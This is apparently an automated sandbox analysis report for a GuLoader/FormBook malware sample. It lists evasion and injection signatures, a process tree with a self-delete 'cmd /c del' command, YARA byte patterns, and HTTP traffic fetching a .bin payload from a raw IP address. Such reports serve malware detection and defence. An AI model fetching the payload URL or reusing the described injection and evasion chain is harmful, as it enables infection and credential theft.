Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 2eD17GZuWs.exe

Overview

General Information

Sample Name:2eD17GZuWs.exe
Analysis ID:320425
MD5:c05eee88f0b57e853996957d6523397b
SHA1:fc16fa4ab9a88f7e2405eb9a77d168d9c1b7c8d3
SHA256:7e70e44956cdb045fd7b5c66eca50996900059fd8851aa76be19a5dd492c6918
Tags:exeGuLoader

Most interesting Screenshot:

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Potential malicious icon found
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
PE file contains strange resources
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • 2eD17GZuWs.exe (PID: 4700 cmdline: 'C:\Users\user\Desktop\2eD17GZuWs.exe' MD5: C05EEE88F0B57E853996957D6523397B)
    • 2eD17GZuWs.exe (PID: 2936 cmdline: 'C:\Users\user\Desktop\2eD17GZuWs.exe' MD5: C05EEE88F0B57E853996957D6523397B)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autofmt.exe (PID: 6660 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
        • msiexec.exe (PID: 6680 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
          • cmd.exe (PID: 6244 cmdline: /c del 'C:\Users\user\Desktop\2eD17GZuWs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.932470718.000000000329A000.00000004.00000020.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
  • 0x22bc:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
0000000D.00000002.935336977.00000000055DF000.00000004.00000001.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
  • 0x2970:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    Click to see the 12 entries

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: 2eD17GZuWs.exeVirustotal: Detection: 25%Perma Link
    Yara detected FormBookShow sources
    Source: Yara matchFile source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop esi
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop esi

    Networking:

    barindex
    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
    Source: TrafficSnort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.4:49756 -> 103.125.191.5:80
    Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
    Source: global trafficHTTP traffic detected: GET /bin_xMjelaYnr43.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 103.125.191.5Cache-Control: no-cache
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: unknownTCP traffic detected without corresponding DNS query: 103.125.191.5
    Source: global trafficHTTP traffic detected: GET /bin_xMjelaYnr43.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 103.125.191.5Cache-Control: no-cache
    Source: 2eD17GZuWs.exe, 00000001.00000002.928458563.000000000093D000.00000004.00000020.sdmpString found in binary or memory: http://103.125.191.5/
    Source: 2eD17GZuWs.exeString found in binary or memory: http://103.125.191.5/bin_xMjelaYnr43.bin
    Source: 2eD17GZuWs.exe, 00000001.00000002.928446229.0000000000924000.00000004.00000020.sdmpString found in binary or memory: http://103.125.191.5/bin_xMjelaYnr43.binY
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
    Source: explorer.exe, 0000000A.00000002.935388452.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
    Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
    Source: 2eD17GZuWs.exe, 00000001.00000002.928394579.00000000008F7000.00000004.00000020.sdmpString found in binary or memory: https://in_xMjelaYnr43.bin

    E-Banking Fraud:

    barindex
    Yara detected FormBookShow sources
    Source: Yara matchFile source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, type: MEMORY

    System Summary:

    barindex
    Malicious sample detected (through community Yara rule)Show sources
    Source: 0000000D.00000002.932470718.000000000329A000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 0000000D.00000002.935336977.00000000055DF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Potential malicious icon foundShow sources
    Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeProcess Stats: CPU usage > 98%
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D5A6C NtProtectVirtualMemory,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D06B1 NtSetInformationThread,TerminateProcess,CreateFileA,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D5336 NtSetInformationThread,LoadLibraryA,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D232A NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D5F9F NtResumeThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D078C NtWriteVirtualMemory,TerminateProcess,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D044B EnumWindows,NtSetInformationThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D54F4 NtSetInformationThread,NtWriteVirtualMemory,LoadLibraryA,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D260D NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D6239 NtResumeThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D62C5 NtResumeThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D2705 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D6325 NtResumeThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D0F7D NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D276A NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D23D5 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D5FC1 NtResumeThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D47EF NtSetInformationThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D5FE5 NtResumeThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D6015 NtResumeThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D6039 NtResumeThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D5435 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D2455 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D6089 NtResumeThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D24BD NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D04B2 NtSetInformationThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D60D1 NtResumeThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D04CD NtSetInformationThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D0516 NtSetInformationThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D6106 NtResumeThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D0537 NtSetInformationThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D2531 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D059D NtSetInformationThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D05D9 NtSetInformationThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D61ED NtResumeThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189660 NtAllocateVirtualMemory,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1896E0 NtFreeVirtualMemory,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189710 NtQueryInformationToken,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189780 NtMapViewOfSection,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1897A0 NtUnmapViewOfSection,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189540 NtReadFile,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1895D0 NtClose,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189A00 NtProtectVirtualMemory,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189A20 NtResumeThread,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189A50 NtCreateFile,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189840 NtDelayExecution,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189860 NtQuerySystemInformation,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1898F0 NtReadVirtualMemory,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189910 NtAdjustPrivilegesToken,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1899A0 NtCreateSection,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189610 NtEnumerateValueKey,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189650 NtQueryValueKey,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189670 NtQueryInformationProcess,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1896D0 NtCreateKey,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E18A710 NtOpenProcessToken,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189730 NtQueryVirtualMemory,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E18A770 NtOpenThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189770 NtSetInformationFile,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189760 NtOpenProcess,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189FE0 NtCreateMutant,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E18AD30 NtSetContextThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189520 NtWaitForSingleObject,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189560 NtWriteFile,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1895F0 NtQueryInformationFile,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189A10 NtQuerySection,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189A80 NtOpenDirectoryObject,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189B00 NtSetValueKey,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E18A3B0 NtGetContextThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189820 NtEnumerateKey,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E18B040 NtSuspendThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1898A0 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189950 NtQueueApcThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1899D0 NtCreateProcessEx,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00565A6C NtProtectVirtualMemory,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00565F9F NtSetInformationThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00566015 NtSetInformationThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00566039 NtSetInformationThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_005660D1 NtSetInformationThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00566089 NtSetInformationThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00566106 NtSetInformationThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_005661ED NtSetInformationThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00566239 NtSetInformationThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_005662C5 NtSetInformationThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00566325 NtSetInformationThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00565FC1 NtSetInformationThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00565FE5 NtSetInformationThread,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119540 NtReadFile,LdrInitializeThunk,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051195D0 NtClose,LdrInitializeThunk,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119FE0 NtCreateMutant,LdrInitializeThunk,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119660 NtAllocateVirtualMemory,LdrInitializeThunk,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051196E0 NtFreeVirtualMemory,LdrInitializeThunk,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119910 NtAdjustPrivilegesToken,LdrInitializeThunk,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119860 NtQuerySystemInformation,LdrInitializeThunk,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119A50 NtCreateFile,LdrInitializeThunk,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0511AD30 NtSetContextThread,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119520 NtWaitForSingleObject,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119560 NtWriteFile,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051195F0 NtQueryInformationFile,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0511A710 NtOpenProcessToken,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119710 NtQueryInformationToken,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119730 NtQueryVirtualMemory,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0511A770 NtOpenThread,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119770 NtSetInformationFile,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119760 NtOpenProcess,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119780 NtMapViewOfSection,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051197A0 NtUnmapViewOfSection,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119610 NtEnumerateValueKey,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119650 NtQueryValueKey,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119670 NtQueryInformationProcess,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051196D0 NtCreateKey,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119950 NtQueueApcThread,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051199A0 NtCreateSection,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051199D0 NtCreateProcessEx,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119820 NtEnumerateKey,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0511B040 NtSuspendThread,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119840 NtDelayExecution,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051198A0 NtWriteVirtualMemory,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051198F0 NtReadVirtualMemory,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119B00 NtSetValueKey,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0511A3B0 NtGetContextThread,
